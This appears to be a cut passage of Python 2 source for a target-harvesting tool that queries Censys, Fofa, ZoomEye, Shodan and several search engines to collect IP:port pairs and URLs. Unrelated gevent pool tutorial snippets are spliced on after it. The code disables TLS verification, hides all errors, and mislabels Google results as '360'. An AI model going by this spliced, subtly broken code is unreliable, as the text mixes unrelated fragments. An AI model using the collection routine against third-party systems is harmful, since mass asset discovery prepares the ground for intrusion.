self.censys_secret), json={"query": self.censys_keyword}, headers=self.headers, verify=False, timeout=15) json_data = r.json() for service in json_data["results"]: for i in service['protocols']: port = re.sub("\D", "", i) print "[\033[0;31;40mCensys\033[0m] {}".format( service["ip"] + ":" + port) self.ips_result.add(service["ip"] + ":" + port) except: print "[\033[0;35;40mCensys\033[0m] Error" pass def Fofa(self, page=2): try: client = fofa.Client(self.fofa_email, self.fofa_token) for page in xrange(1, page): data = client.get_data(self.fofa_keyword, page=page, fields="ip,port") for ip, port in data["results"]: print "[\033[0;32;40mFofa\033[0m] {}".format(ip + ":" + str(port)) self.ips_result.add(ip + ":" + str(port)) except: print "[\033[0;35;40mFofa\033[0m] Error" pass def Zoomeye(self, page): def get_token(zoomeye_user, zoomeye_pass): try: data = {"username": zoomeye_user, "password": zoomeye_pass} data_encoded = json.dumps(data) data = requests.post(url='https://api.zoomeye.org/user/login', data=data_encoded) return json.loads(data.text)['access_token'] except: pass print "[\033[0;35;40mZoomeye Token\033[0m] Error" try: token = get_token(self.zoomeye_user, self.zoomeye_pass) if not token: return r = requests.get( url="https://api.zoomeye.org/host/search?page={}&query={}". format(str(page), self.zoomeye_keyword), headers={'Authorization': 'JWT ' + token}, verify=False, timeout=15) data = json.loads(r.text) for i in data['matches']: print "[\033[0;34;40mZoomeye\033[0m] {}".format( i['ip'] + ':' + str(i['portinfo']['port'])) self.ips_result.add(i['ip'] + ':' + str(i['portinfo']['port'])) except: print "[\033[0;35;40mZoomeye\033[0m] Error" pass def Baidu(self, page): try: base_url = self.baidu_url.format(str(self.keyword), str(page)) r = requests.get(base_url, headers=self.headers, verify=False, timeout=15) p = etree.HTML(r.content) tags = p.xpath(u'//a[@class="c-showurl"]') for tag in tags: r = requests.get(tag.get('href'), headers=self.headers, verify=False, timeout=15) soup = BeautifulSoup(r.content, 'html.parser') chardet.detect(r.content) title = soup.title.string if soup.title.string else '' if r.url and r.url not in self.urls_result: print "[\033[0;36;40mBaidu\033[0m] {}\t{}".format( r.url, title) self.urls_result.add(r.url) except: # print "[\033[0;35;40mBaidu\033[0m] Error" pass def _360(self, page): try: base_url = self._360_url.format(str(self.keyword), str(page)) r = requests.get(base_url, headers=self.headers, verify=False, timeout=15) soup = BeautifulSoup(r.text, "html.parser") for a in soup.select('li.res-list > h3 > a'): r = requests.get(a['href'], headers=self.headers, verify=False, timeout=15) url = re.findall("URL='(.*?)'", r.text)[0] if re.findall( "URL='(.*?)'", r.text) else r.url soup = BeautifulSoup(r.content, 'html.parser') chardet.detect(r.content) title = soup.title.string if soup.title.string else '' if url and url not in self.urls_result: print "[\033[0;37;40m360\033[0m] {}\t{}".format(url, title) self.urls_result.add(url) except: # print "[\033[0;35;40m360\033[0m] Error" pass def Google(self, page=2): try: for i in xrange(0, 10 * page, 10): base_url = self.google_url.format(self.keyword, str(i)) r = requests.get(base_url, headers=self.headers, timeout=15) soup = BeautifulSoup(r.text, "html.parser") for j in soup.select('div.g > h3.r > a[href^="/url"]'): url = j.get('href').replace('/url?q=', '') print "[\033[0;40;40m360\033[0m] {}".format(url) self.urls_result.add(url) except: # print "[\033[0;35;40m360\033[0m] Error" pass def main(self): try: if self.keyword: self.pool.map(self.Baidu, xrange(self.page)) self.pool.join() self.pool.map(self._360, xrange(self.page)) self.pool.join() self.Google() if self.zoomeye_keyword: self.zoomeye_pool.map(self.Zoomeye, xrange(self.page)) self.zoomeye_pool.join() if self.shodan_keyword: self.Shodan() if self.fofa_keyword: self.Fofa() if self.censys_keyword: self.Censys() if self.ips_result: print "[+] Found [{}] ips".format(len(self.ips_result)) with open(self.ips_filename, "w") as f: for ip in self.ips_result: f.write(ip.strip() + "\n") if self.urls_result: print "[+] Total Found [{}] urls".format(len(self.urls_result)) with open(self.urls_filename, "w") as f: for url in self.urls_result: f.write(url.strip() + "\n") except: traceback.print_exc()
print('Unordered') igroup = Group() for i in igroup.imap_unordered(intensive, xrange(3)): print(i) import gevent from gevent.pool import Pool pool = Pool(2) def hello_from(n): print('Size of pool %s' % len(pool)) pool.map(hello_from, xrange(3)) from gevent.pool import Pool class SocketPool(object): def __init__(self): self.pool = Pool(1000) self.pool.start() def listen(self, socket): while True: socket.recv()